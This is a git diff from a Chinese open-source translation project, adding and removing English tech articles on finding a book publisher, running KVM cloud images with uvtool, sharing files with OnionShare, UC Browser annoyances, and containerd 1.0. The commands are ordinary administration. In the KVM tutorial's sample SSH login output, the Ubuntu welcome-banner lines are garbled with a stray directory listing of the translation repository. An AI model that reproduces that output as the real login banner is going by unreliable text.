Once you've identified a few targets, do some more research into the publishers' catalogs, either on their own site, or on Amazon. See what books they have that are similar to your idea. If they have a book that's identical, or nearly so, you'll have a tough time convincing them to sign yours. That doesn't necessarily mean you should drop that publisher from your list. You can make some changes to your proposal to differentiate it from the existing book: target a different audience, or a different skill level. Maybe the existing book is outdated, and you could focus on new approaches to the technology. Make your proposal into a book that complements the existing one, rather than competes.
|
||||
|
||||
If your target publisher has no books that are similar, that can be a good sign, or a very bad one. Sometimes publishers choose not to publish on specific technologies, either because they don't believe their audience is interested, or they've had trouble with that technology in the past. New languages and libraries pop up all the time, and publishers have to make informed guesses about which will appeal to their readers. Their assessment may not be the same as yours. Their decision might be final, or they might be waiting for the right proposal. The only way to know is to propose and find out.
|
||||
|
||||
### Work your network
|
||||
|
||||
Identifying a publisher is the first step; now you need to make contact. Unfortunately, publishing is still about _who_ you know, more than _what_ you know. The person you want to know is an _acquisitions editor,_ the editor whose job is to find new markets, authors, and proposals. If you know someone who has connections with a publisher, ask for an introduction to an acquisitions editor. These editors often specialize in particular subject areas, particularly at larger publishers, but you don't need to find the right one yourself. They're usually happy to connect you with the correct person.
|
||||
|
||||
Sometimes you can find an acquisitions editor at a technical conference, especially one where the publisher is a sponsor, and has a booth. Even if there's not an acquisitions editor on site at the time, the staff at the booth can put you in touch with one. If conferences aren't your thing, you'll need to work your network to get an introduction. Use LinkedIn, or your informal contacts, to get in touch with an editor.
|
||||
|
||||
For smaller publishers, you may find acquisitions editors listed on the company website, with contact information if you're lucky. If not, search for the publisher's name on Twitter, and see if you can turn up their editors. You might be nervous about trying to reach out to a stranger over social media to show them your book, but don't worry about it. Making contact is what acquisitions editors do. The worst-case result is they ignore you.
|
||||
|
||||
Once you've made contact, the acquisitions editor will assist you with the next steps. They may have some feedback on your proposal right away, or they may want you to flesh it out according to their guidelines before they'll consider it. After you've put in the effort to find an acquisitions editor, listen to their advice. They know their system better than you do.
|
||||
|
||||
### If all else fails
|
||||
|
||||
If you can't find an acquisitions editor to contact, the publisher almost certainly has a blind proposal alias, usually of the form `proposals@[publisher].com`. Check the web site for instructions on what to send to a proposal alias; some publishers have specific requirements. Follow these instructions. If you don't, you have a good chance of your proposal getting thrown out before anybody looks at it. If you have questions, or aren't sure what the publisher wants, you'll need to try again to find an editor to talk to, because the proposal alias is not the place to get questions answered. Put together what they've asked for (which is a topic for a separate article), send it in, and hope for the best.
|
||||
|
||||
### And ... wait
|
||||
|
||||
No matter how you've gotten in touch with a publisher, you'll probably have to wait. If you submitted to the proposals alias, it's going to take a while before somebody does anything with that proposal, especially at a larger company. Even if you've found an acquisitions editor to work with, you're probably one of many prospects she's working with simultaneously, so you might not get rapid responses. Almost all publishers have a committee that decides on which proposals to accept, so even if your proposal is awesome and ready to go, you'll still need to wait for the committee to meet and discuss it. You might be waiting several weeks, or even a month before you hear anything.
|
||||
|
||||
After a couple of weeks, it's fine to check back in with the editor to see if they need any more information. You want to be polite in this e-mail; if they haven't answered because they're swamped with proposals, being pushy isn't going to get you to the front of the line. It's possible that some publishers will never respond at all instead of sending a rejection notice, but that's uncommon. There's not a lot to do at this point other than be patient. Of course, if it's been months and nobody's returning your e-mails, you're free to approach a different publisher or consider self-publishing.
|
||||
|
||||
### Good luck
|
||||
|
||||
If this process seems somewhat scattered and unscientific, you're right; it is. Getting published depends on being in the right place, at the right time, talking to the right person, and hoping they're in the right mood. You can't control all of those variables, but having a better knowledge of how the industry works, and what publishers are looking for, can help you optimize the ones you can control.
|
||||
|
||||
Finding a publisher is one step in a lengthy process. You need to refine your idea and create the proposal, as well as other considerations. At SeaGL this year [I presented][5] an introduction to the entire process. Check out [the video][6] for more detailed information.
|
||||
|
||||
### About the author
|
||||
|
||||
[![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/portrait.jpg?itok=b77dlNC4)][7]
|
||||
|
||||
Brian MacDonald - Brian MacDonald is Managing Editor at the Pragmatic Bookshelf. Over the last 20 years in tech publishing, he's been an editor, author, and occasional speaker and trainer. He currently spends a lot of his time talking to new authors about how they can best present their ideas. You can follow him on Twitter at @bmac_editor.[More about me][2]
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/12/how-find-publisher-your-book
|
||||
|
||||
作者:[Brian MacDonald ][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/bmacdonald
|
||||
[1]:https://opensource.com/article/17/12/how-find-publisher-your-book?rate=o42yhdS44MUaykAIRLB3O24FvfWxAxBKa5WAWSnSY0s
|
||||
[2]:https://opensource.com/users/bmacdonald
|
||||
[3]:https://opensource.com/user/190176/feed
|
||||
[4]:https://pragprog.com/
|
||||
[5]:https://archive.org/details/SeaGL2017WritingTheNextGreatTechBook
|
||||
[6]:https://archive.org/details/SeaGL2017WritingTheNextGreatTechBook
|
||||
[7]:https://opensource.com/users/bmacdonald
|
||||
[8]:https://opensource.com/users/bmacdonald
|
||||
[9]:https://opensource.com/users/bmacdonald
|
||||
[10]:https://opensource.com/article/17/12/how-find-publisher-your-book#comments
|
@ -1,3 +1,4 @@
|
||||
translating by kimii
|
||||
Ubuntu 18.04 – New Features, Release Date & More
|
||||
============================================================
|
||||
|
||||
|
@ -0,0 +1,233 @@
|
||||
How to use KVM cloud images on Ubuntu Linux
|
||||
======
|
||||
|
||||
Kernel-based Virtual Machine (KVM) is a virtualization module for the Linux kernel that turns it into a hypervisor. You can create an Ubuntu cloud image with KVM from the command line using Ubuntu virtualisation front-end for libvirt and KVM.
|
||||
|
||||
How do I download and use a cloud image with kvm running on an Ubuntu Linux server? How do I create create a virtual machine without the need of a complete installation on an Ubuntu Linux 16.04 LTS server?Kernel-based Virtual Machine (KVM) is a virtualization module for the Linux kernel that turns it into a hypervisor. You can create an Ubuntu cloud image with KVM from the command line using Ubuntu virtualisation front-end for libvirt and KVM.
|
||||
|
||||
This quick tutorial shows to install and use uvtool that provides a unified and integrated VM front-end to Ubuntu cloud image downloads, libvirt, and cloud-init.
|
||||
|
||||
### Step 1 - Install KVM
|
||||
|
||||
You must have kvm installed and configured. Use the [apt command][1]/[apt-get command][2] as follows:
|
||||
```
|
||||
$ sudo apt install qemu-kvm libvirt-bin virtinst bridge-utils cpu-checker
|
||||
$ kvm-ok
|
||||
## [configure bridged networking as described here][3]
|
||||
$ sudo vi /etc/network/interfaces
|
||||
$ sudo systemctl restart networking
|
||||
$ sudo brctl show
|
||||
```
|
||||
See "[How to install KVM on Ubuntu 16.04 LTS Headless Server][4]" for more info.
|
||||
|
||||
### Step 2 - Install uvtool
|
||||
|
||||
Type the following [apt command][1]/[apt-get command][2]:
|
||||
```
|
||||
$ sudo apt install uvtool
|
||||
```
|
||||
Sample outputs:
|
||||
```
|
||||
[sudo] password for vivek:
|
||||
Reading package lists... Done
|
||||
Building dependency tree
|
||||
Reading state information... Done
|
||||
The following packages were automatically installed and are no longer required:
|
||||
gksu libgksu2-0 libqt5designer5 libqt5help5 libqt5printsupport5 libqt5sql5 libqt5sql5-sqlite libqt5xml5 python3-dbus.mainloop.pyqt5 python3-notify2 python3-pyqt5 python3-sip
|
||||
Use 'sudo apt autoremove' to remove them.
|
||||
The following additional packages will be installed:
|
||||
cloud-image-utils distro-info python-boto python-pyinotify python-simplestreams socat ubuntu-cloudimage-keyring uvtool-libvirt
|
||||
Suggested packages:
|
||||
cloud-utils-euca shunit2 python-pyinotify-doc
|
||||
The following NEW packages will be installed:
|
||||
cloud-image-utils distro-info python-boto python-pyinotify python-simplestreams socat ubuntu-cloudimage-keyring uvtool uvtool-libvirt
|
||||
0 upgraded, 9 newly installed, 0 to remove and 0 not upgraded.
|
||||
Need to get 1,211 kB of archives.
|
||||
After this operation, 6,876 kB of additional disk space will be used.
|
||||
Get:1 http://in.archive.ubuntu.com/ubuntu artful/main amd64 distro-info amd64 0.17 [20.3 kB]
|
||||
Get:2 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 python-boto all 2.44.0-1ubuntu2 [740 kB]
|
||||
Get:3 http://in.archive.ubuntu.com/ubuntu artful/main amd64 python-pyinotify all 0.9.6-1 [24.6 kB]
|
||||
Get:4 http://in.archive.ubuntu.com/ubuntu artful/main amd64 ubuntu-cloudimage-keyring all 2013.11.11 [4,504 B]
|
||||
Get:5 http://in.archive.ubuntu.com/ubuntu artful/main amd64 cloud-image-utils all 0.30-0ubuntu2 [17.2 kB]
|
||||
Get:6 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 python-simplestreams all 0.1.0~bzr450-0ubuntu1 [29.7 kB]
|
||||
Get:7 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 socat amd64 1.7.3.2-1 [342 kB]
|
||||
Get:8 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 uvtool all 0~git122-0ubuntu1 [6,498 B]
|
||||
Get:9 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 uvtool-libvirt all 0~git122-0ubuntu1 [26.9 kB]
|
||||
Fetched 1,211 kB in 3s (393 kB/s)
|
||||
Selecting previously unselected package distro-info.
|
||||
(Reading database ... 199933 files and directories currently installed.)
|
||||
Preparing to unpack .../0-distro-info_0.17_amd64.deb ...
|
||||
Unpacking distro-info (0.17) ...
|
||||
Selecting previously unselected package python-boto.
|
||||
Preparing to unpack .../1-python-boto_2.44.0-1ubuntu2_all.deb ...
|
||||
Unpacking python-boto (2.44.0-1ubuntu2) ...
|
||||
Selecting previously unselected package python-pyinotify.
|
||||
Preparing to unpack .../2-python-pyinotify_0.9.6-1_all.deb ...
|
||||
Unpacking python-pyinotify (0.9.6-1) ...
|
||||
Selecting previously unselected package ubuntu-cloudimage-keyring.
|
||||
Preparing to unpack .../3-ubuntu-cloudimage-keyring_2013.11.11_all.deb ...
|
||||
Unpacking ubuntu-cloudimage-keyring (2013.11.11) ...
|
||||
Selecting previously unselected package cloud-image-utils.
|
||||
Preparing to unpack .../4-cloud-image-utils_0.30-0ubuntu2_all.deb ...
|
||||
Unpacking cloud-image-utils (0.30-0ubuntu2) ...
|
||||
Selecting previously unselected package python-simplestreams.
|
||||
Preparing to unpack .../5-python-simplestreams_0.1.0~bzr450-0ubuntu1_all.deb ...
|
||||
Unpacking python-simplestreams (0.1.0~bzr450-0ubuntu1) ...
|
||||
Selecting previously unselected package socat.
|
||||
Preparing to unpack .../6-socat_1.7.3.2-1_amd64.deb ...
|
||||
Unpacking socat (1.7.3.2-1) ...
|
||||
Selecting previously unselected package uvtool.
|
||||
Preparing to unpack .../7-uvtool_0~git122-0ubuntu1_all.deb ...
|
||||
Unpacking uvtool (0~git122-0ubuntu1) ...
|
||||
Selecting previously unselected package uvtool-libvirt.
|
||||
Preparing to unpack .../8-uvtool-libvirt_0~git122-0ubuntu1_all.deb ...
|
||||
Unpacking uvtool-libvirt (0~git122-0ubuntu1) ...
|
||||
Setting up distro-info (0.17) ...
|
||||
Setting up ubuntu-cloudimage-keyring (2013.11.11) ...
|
||||
Setting up cloud-image-utils (0.30-0ubuntu2) ...
|
||||
Setting up socat (1.7.3.2-1) ...
|
||||
Setting up python-pyinotify (0.9.6-1) ...
|
||||
Setting up python-boto (2.44.0-1ubuntu2) ...
|
||||
Setting up python-simplestreams (0.1.0~bzr450-0ubuntu1) ...
|
||||
Processing triggers for doc-base (0.10.7) ...
|
||||
Processing 1 added doc-base file...
|
||||
Setting up uvtool (0~git122-0ubuntu1) ...
|
||||
Processing triggers for man-db (2.7.6.1-2) ...
|
||||
Setting up uvtool-libvirt (0~git122-0ubuntu1) ...
|
||||
```
|
||||
|
||||
|
||||
### Step 3 - Download the Ubuntu Cloud image
|
||||
|
||||
You need to use the uvt-simplestreams-libvirt command. It maintains a libvirt volume storage pool as a local mirror of a subset of images available from a simplestreams source, such as Ubuntu cloud images. To update uvtool's libvirt volume storage pool with all current amd64 images, run:
|
||||
`$ uvt-simplestreams-libvirt sync arch=amd64`
|
||||
To just update/grab Ubuntu 16.04 LTS (xenial/amd64) image run:
|
||||
`$ uvt-simplestreams-libvirt --verbose sync release=xenial arch=amd64`
|
||||
Sample outputs:
|
||||
```
|
||||
Adding: com.ubuntu.cloud:server:16.04:amd64 20171121.1
|
||||
```
|
||||
|
||||
Pass the query option to queries the local mirror:
|
||||
`$ uvt-simplestreams-libvirt query`
|
||||
Sample outputs:
|
||||
```
|
||||
release=xenial arch=amd64 label=release (20171121.1)
|
||||
```
|
||||
|
||||
Now, I have an image for Ubuntu xenial and I create the VM.
|
||||
|
||||
### Step 4 - Create the SSH keys
|
||||
|
||||
You need ssh keys for login into KVM VMs. Use the ssh-keygen command to create a new one if you do not have any keys at all.
|
||||
`$ ssh-keygen`
|
||||
See "[How To Setup SSH Keys on a Linux / Unix System][5]" and "[Linux / UNIX: Generate SSH Keys][6]" for more info.
|
||||
|
||||
### Step 5 - Create the VM
|
||||
|
||||
It is time to create the VM named vm1 i.e. create an Ubuntu Linux 16.04 LTS VM:
|
||||
`$ uvt-kvm create vm1`
|
||||
By default vm1 created using the following characteristics:
|
||||
|
||||
1. RAM/memory : 512M
|
||||
2. Disk size: 8GiB
|
||||
3. CPU: 1 vCPU core
|
||||
|
||||
|
||||
|
||||
To control ram, disk, cpu, and other characteristics use the following syntax:
|
||||
`$ uvt-kvm create vm1 \
|
||||
--memory MEMORY \
|
||||
--cpu CPU \
|
||||
--disk DISK \
|
||||
--bridge BRIDGE \
|
||||
--ssh-public-key-file /path/to/your/SSH_PUBLIC_KEY_FILE \
|
||||
--packages PACKAGES1, PACKAGES2, .. \
|
||||
--run-script-once RUN_SCRIPT_ONCE \
|
||||
--password PASSWORD
|
||||
`
|
||||
Where,
|
||||
|
||||
1. **\--password PASSWORD** : Set the password for the ubuntu user and allow login using the ubuntu user (not recommended use ssh keys).
|
||||
2. **\--run-script-once RUN_SCRIPT_ONCE** : Run RUN_SCRIPT_ONCE script as root on the VM the first time it is booted, but never again. Give full path here. This is useful to run custom task on VM such as setting up security or other stuff.
|
||||
3. **\--packages PACKAGES1, PACKAGES2, ..** : Install the comma-separated packages on first boot.
|
||||
|
||||
|
||||
|
||||
To get help, run:
|
||||
```
|
||||
$ uvt-kvm -h
|
||||
$ uvt-kvm create -h
|
||||
```
|
||||
|
||||
#### How do I delete my VM?
|
||||
|
||||
To destroy/delete your VM named vm1, run (please use the following command with care as there would be no confirmation box):
|
||||
`$ uvt-kvm destroy vm1`
|
||||
|
||||
#### To find out the IP address of the vm1, run:
|
||||
|
||||
`$ uvt-kvm ip vm1`
|
||||
192.168.122.52
|
||||
|
||||
#### To list all VMs run
|
||||
|
||||
`$ uvt-kvm list`
|
||||
Sample outputs:
|
||||
```
|
||||
vm1
|
||||
freebsd11.1
|
||||
|
||||
```
|
||||
|
||||
### Step 6 - How to login to the vm named vm1
|
||||
|
||||
The syntax is:
|
||||
`$ uvt-kvm ssh vm1`
|
||||
Sample outputs:
|
||||
```
|
||||
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-101-generic x86_64)
|
||||
|
||||
comic core.md Dict.md lctt2014.md lctt2016.md LCTT翻译规范.md LICENSE Makefile published README.md sign.md sources translated 选题模板.txt 中文排版指北.md Documentation: https://help.ubuntu.com
|
||||
comic core.md Dict.md lctt2014.md lctt2016.md LCTT翻译规范.md LICENSE Makefile published README.md sign.md sources translated 选题模板.txt 中文排版指北.md Management: https://landscape.canonical.com
|
||||
comic core.md Dict.md lctt2014.md lctt2016.md LCTT翻译规范.md LICENSE Makefile published README.md sign.md sources translated 选题模板.txt 中文排版指北.md Support: https://ubuntu.com/advantage
|
||||
|
||||
Get cloud support with Ubuntu Advantage Cloud Guest:
|
||||
http://www.ubuntu.com/business/services/cloud
|
||||
|
||||
0 packages can be updated.
|
||||
0 updates are security updates.
|
||||
|
||||
|
||||
Last login: Thu Dec 7 09:55:06 2017 from 192.168.122.1
|
||||
|
||||
```
|
||||
|
||||
Another option is to use the regular ssh command from macOS/Linux/Unix/Windows client:
|
||||
`$ ssh [[email protected]][7]
|
||||
$ ssh -i ~/.ssh/id_rsa [[email protected]][7]`
|
||||
Sample outputs:
|
||||
[![Connect to the running VM using ssh][8]][8]
|
||||
Once vim created you can use the virsh command as usual:
|
||||
`$ virsh list`
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.cyberciti.biz/faq/how-to-use-kvm-cloud-images-on-ubuntu-linux/
|
||||
|
||||
作者:[Vivek Gite][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.cyberciti.biz
|
||||
[1]:https://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info)
|
||||
[2]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info)
|
||||
[3]:https://www.cyberciti.biz/faq/how-to-create-bridge-interface-ubuntu-linux/
|
||||
[4]:https://www.cyberciti.biz/faq/installing-kvm-on-ubuntu-16-04-lts-server/
|
||||
[5]:https://www.cyberciti.biz/faq/how-to-set-up-ssh-keys-on-linux-unix/
|
||||
[6]:https://www.cyberciti.biz/faq/linux-unix-generating-ssh-keys/
|
||||
[7]:https://www.cyberciti.biz/cdn-cgi/l/email-protection
|
||||
[8]:https://www.cyberciti.biz/media/new/faq/2017/12/connect-to-the-running-VM-using-ssh.jpg
|
@ -1,79 +0,0 @@
|
||||
translating---geekpi
|
||||
|
||||
OnionShare - Share Files Anonymously
|
||||
======
|
||||
In this Digital World, we share our media, documents, important files via the Internet using different cloud storage like Dropbox, Mega, Google Drive and many more. But every cloud storage comes with two major problems, one is the Size and the other Security. After getting used to Bit Torrent the size is not a matter anymore, but the security is.
|
||||
|
||||
Even though you send your files through the secure cloud services they will be noted by the company, if the files are confidential, even the government can have them. So to overcome these problems we use OnionShare, as per the name it uses the Onion internet i.e Tor to share files Anonymously to anyone.
|
||||
|
||||
### How to Use **OnionShare**?
|
||||
|
||||
* First Download the [OnionShare][1] and [Tor Browser][2]. After downloading install both of them.
|
||||
|
||||
|
||||
|
||||
[![install onionshare and tor browser][3]][3]
|
||||
|
||||
* Now open OnionShare from the start menu
|
||||
|
||||
|
||||
|
||||
[![onionshare share files anonymously][4]][4]
|
||||
|
||||
* Click on Add and add a File/Folder to share.
|
||||
* Click start sharing. It produces a .onion URL, you could share the URL with your recipient.
|
||||
|
||||
|
||||
|
||||
[![share file with onionshare anonymously][5]][5]
|
||||
|
||||
* To Download file from the URL, copy the URL and open Tor Browser and paste it. Open the URL and download the Files/Folder.
|
||||
|
||||
|
||||
|
||||
[![receive file with onionshare anonymously][6]][6]
|
||||
|
||||
### Start of **OnionShare**
|
||||
|
||||
A few years back when Glenn Greenwald found that some of the NSA documents which he received from Edward Snowden had been corrupted. But he needed the documents and decided to get the files by using a USB. It was not successful.
|
||||
|
||||
After reading the book written by Greenwald, Micah Lee crypto expert at The Intercept, released the OnionShare - simple, free software to share files anonymously and securely. He created the program to share big data dumps via a direct channel encrypted and protected by the anonymity software Tor, making it hard to get the files for the eavesdroppers.
|
||||
|
||||
### How Does **OnionShare** Work?
|
||||
|
||||
OnionShare starts a web server at 127.0.0.1 for sharing the file on a random port. It chooses any of two words from the wordlist of 6800-wordlist called slug. It makes the server available as Tor onion service to send the file. The final URL looks like:
|
||||
|
||||
`http://qx2d7lctsnqwfdxh.onion/subside-durable`
|
||||
|
||||
The OnionShare shuts down after downloading. There is an option to allow the files to be downloaded multiple times. This makes the file not available on the internet anymore.
|
||||
|
||||
### Advantages of using **OnionShare**
|
||||
|
||||
Other Websites or Applications have access to your files: The file the sender shares using OnionShare is not stored on any server. It is directly hosted on the sender's system.
|
||||
|
||||
No one can spy on the shared files: As the connection between the users is encrypted by the Onion service and Tor Browser. This makes the connection secure and hard to eavesdroppers to get the files.
|
||||
|
||||
Both users are Anonymous: OnionShare and Tor Browser make both sender and recipient anonymous.
|
||||
|
||||
### Conclusion
|
||||
|
||||
In this article, I have explained how to **share your documents, files anonymously**. I also explained how it works. Hope you have understood how OnionShare works, and if you still have a doubt regarding anything, just drop in a comment.
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.theitstuff.com/onionshare-share-files-anonymously-2
|
||||
|
||||
作者:[Anirudh Rayapeddi][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.theitstuff.com
|
||||
[1]https://onionshare.org/
|
||||
[2]https://www.torproject.org/projects/torbrowser.html.en
|
||||
[3]http://www.theitstuff.com/wp-content/uploads/2017/12/Icons.png
|
||||
[4]http://www.theitstuff.com/wp-content/uploads/2017/12/Onion-Share.png
|
||||
[5]http://www.theitstuff.com/wp-content/uploads/2017/12/With-Link.png
|
||||
[6]http://www.theitstuff.com/wp-content/uploads/2017/12/Tor.png
|
@ -1,95 +0,0 @@
|
||||
translating---geekpi
|
||||
|
||||
The Biggest Problems With UC Browser
|
||||
======
|
||||
Before we even begin talking about the cons, I want to establish the fact that
|
||||
I have been a devoted UC Browser user for the past 3 years. I really love the
|
||||
download speeds I get, the ultra-sleek user interface and eye-catching icons
|
||||
used for tools. I was a Chrome for Android user in the beginning but I
|
||||
migrated to UC on a friend's recommendation. But in the past 1 year or so, I
|
||||
have seen some changes that have made me rethink about my choice and now I
|
||||
feel like migrating back to chrome again.
|
||||
|
||||
### The Unwanted **Notifications**
|
||||
|
||||
I am sure I am not the only one who gets these unwanted notifications every
|
||||
few hours. These clickbait articles are a real pain and the worst part is that
|
||||
you get them every few hours.
|
||||
|
||||
[![uc browser's annoying ads notifications][1]][1]
|
||||
|
||||
I tried closing them down from the notification settings but they still kept
|
||||
appearing with a less frequency.
|
||||
|
||||
### The **News Homepage**
|
||||
|
||||
Another unwanted section that is completely useless. We completely understand
|
||||
that UC browser is free to download and it may require funding but this is not
|
||||
the way to do it. The homepage features news articles that are extremely
|
||||
distracting and unwanted. Sometimes when you are in a professional or family
|
||||
environment some of these click baits might even cause awkwardness.
|
||||
|
||||
[![uc browser's embarrassing news homepage][2]][2]
|
||||
|
||||
And they even have a setting for that. To Turn the **UC** **News Display ON /
|
||||
OFF.** And guess what, I tried that too **.** In the image below, You can see
|
||||
my efforts on the left-hand side and the output on the right-hand side.[![uc
|
||||
browser homepage settings][3]][3]
|
||||
|
||||
And click bait news isn't enough, they have started adding some unnecessary
|
||||
features. So let's include them as well.
|
||||
|
||||
### UC **Music**
|
||||
|
||||
UC browser integrated a **music player** in their browser to play music. It 's
|
||||
just something that works, nothing too fancy. So why even have it? What's the
|
||||
point? Who needs a music player in their browsers?
|
||||
|
||||
[![uc browser adds uc music player][4]][4]
|
||||
|
||||
It's not even like it will play audio from the web directly via that player in
|
||||
the background. Instead, it is a music player that plays offline music. So why
|
||||
have it? I mean it is not even good enough to be used as a primary music
|
||||
player. Even if it was, it doesn't run independently of UC Browser. So why
|
||||
would someone have his/her browser running just to use your Music Player?
|
||||
|
||||
### The **Quick** Access Bar
|
||||
|
||||
I have seen 9 out of 10 average users have this bar hanging around in their
|
||||
notification area because it comes default with the installation and they
|
||||
don't know how to get rid of it. The settings on the right get the job done.
|
||||
|
||||
[![uc browser annoying quick access bar][5]][5]
|
||||
|
||||
But I still wanna ask, "Why does it come by default ?". It's a headache for
|
||||
most users. If we want it we will enable it. Why forcing the users though.
|
||||
|
||||
### Conclusion
|
||||
|
||||
UC browser is still one of the top players in the game. It provides one of the
|
||||
best experiences, however, I am not sure what UC is trying to prove by packing
|
||||
more and more unwanted features in their browser and forcing the user to use
|
||||
them.
|
||||
|
||||
I have loved UC for its speed and design. But recent experiences have led to
|
||||
me having a second thought about my primary browser.
|
||||
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.theitstuff.com/biggest-problems-uc-browser
|
||||
|
||||
作者:[Rishabh Kandari][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.theitstuff.com/author/reevkandari
|
||||
[1]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-6.png
|
||||
[2]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-1-1.png
|
||||
[3]:http://www.theitstuff.com/wp-content/uploads/2017/12/uceffort.png
|
||||
[4]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-3-1.png
|
||||
[5]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-4-1.png
|
||||
|
50
sources/tech/20171211 A tour of containerd 1.0.md
Normal file
50
sources/tech/20171211 A tour of containerd 1.0.md
Normal file
@ -0,0 +1,50 @@
|
||||
A tour of containerd 1.0
|
||||
======
|
||||
XiaochenCui translating
|
||||
|
||||
![containerd][1]
|
||||
|
||||
We have done a few talks in the past on different features of containerd, how it was designed, and some of the problems that we have fixed along the way. Containerd is used by Docker, Kubernetes CRI, and a few other projects but this is a post for people who may not know what containerd actually does within these platforms. I would like to do more posts on the feature set and design of containerd in the future but for now, we will start with the basics.
|
||||
|
||||
I think the container ecosystem can be confusing at times. Especially with the terminology that we use. Whats this? A runtime. And this? A runtime… containerd (pronounced " _container-dee "_) as the name implies, not contain nerd as some would like to troll me with, is a container daemon. It was originally built as an integration point for OCI runtimes like runc but over the past six months it has added a lot of functionality to bring it up to par with the needs of modern container platforms like Docker and orchestration systems like Kubernetes.
|
||||
|
||||
So what do you actually get using containerd? You get push and pull functionality as well as image management. You get container lifecycle APIs to create, execute, and manage containers and their tasks. An entire API dedicated to snapshot management and an openly governed project to depend on. Basically everything that you need to build a container platform without having to deal with the underlying OS details. I think the most important part of containerd is having a versioned and stable API that will have bug fixes and security patches backported.
|
||||
|
||||
![containerd][2]
|
||||
|
||||
Since there is no such thing as Linux containers in the kernel, containers are various kernel features tied together, when you are building a large platform or distributed system you want an abstraction layer between your management code and the syscalls and duct tape of features to run a container. That is where containerd lives. It provides a client a layer of stable types that platforms can build on top of without ever having to drop down to the kernel level. It's so much nicer to work with Container, Task, and Snapshot types than it is to manage calls to clone() or mount(). Balanced with the flexibility to directly interact with the runtime or host-machine, these objects avoid the sacrifice of capabilities that typically come with higher-level abstractions. The result is that easy tasks are simple to complete and hard tasks are possible.
|
||||
|
||||
![containerd][3]Containerd was designed to be used by Docker and Kubernetes as well as any other container system that wants to abstract away syscalls or OS specific functionality to run containers on Linux, Windows, Solaris, or other Operating Systems. With these users in mind, we wanted to make sure that containerd has only what they need and nothing that they don't. Realistically this is impossible but at least that is what we try for. While networking is out of scope for containerd, what it doesn't do lets higher level systems have full control. The reason for this is, when you are building a distributed system, networking is a very central aspect. With SDN and service discovery today, networking is way more platform specific than abstracting away netlink calls on linux. Most of the new overlay networks are route based and require routing tables to be updated each time a new container is created or deleted. Service discovery, DNS, etc all have to be notified of these changes as well. It would be a large chunk of code to be able to support all the different network interfaces, hooks, and integration points to support this if we added networking to containerd. What we did instead is opted for a robust events system inside containerd so that multiple consumers can subscribe to the events that they care about. We also expose a [Task API ][4]that lets users create a running task, have the ability to add interfaces to the network namespace of the container, and then start the container's process without the need for complex hooks in various points of a container's lifecycle.
|
||||
|
||||
Another area that has been added to containerd over the past few months is a complete storage and distribution system that supports both OCI and Docker image formats. You have a complete content addressed storage system across the containerd API that works not only for images but also metadata, checkpoints, and arbitrary data attached to containers.
|
||||
|
||||
We also took the time to [rethink how "graphdrivers" work][5]. These are the overlay or block level filesystems that allow images to have layers and you to perform efficient builds. Graphdrivers were initially written by Solomon and I when we added support for devicemapper. Docker only supported AUFS at the time so we modeled the graphdrivers after the overlay filesystem. However, making a block level filesystem such as devicemapper/lvm act like an overlay filesystem proved to be much harder to do in the long run. The interfaces had to expand over time to support different features than what we originally thought would be needed. With containerd, we took a different approach, make overlay filesystems act like a snapshotter instead of vice versa. This was much easier to do as overlay filesystems provide much more flexibility than snapshotting filesystems like BTRFS, ZFS, and devicemapper as they don't have a strict parent/child relationship. This helped us build out [a smaller interface for the snapshotters][6] while still fulfilling the requirements needed from things [like a builder][7] as well as reduce the amount of code needed, making it much easier to maintain in the long run.
|
||||
|
||||
![][8]
|
||||
|
||||
You can find more details about the architecture of containerd in [Stephen Day's Dec 7th 2017 KubeCon SIG Node presentation][9].
|
||||
|
||||
In addition to the technical and design changes in the 1.0 codebase, we also switched the containerd [governance model from the long standing BDFL to a Technical Steering Committee][10] giving the community an independent third party resource to rely on.
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://blog.docker.com/2017/12/containerd-ga-features-2/
|
||||
|
||||
作者:[Michael Crosby][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://blog.docker.com/author/michael/
|
||||
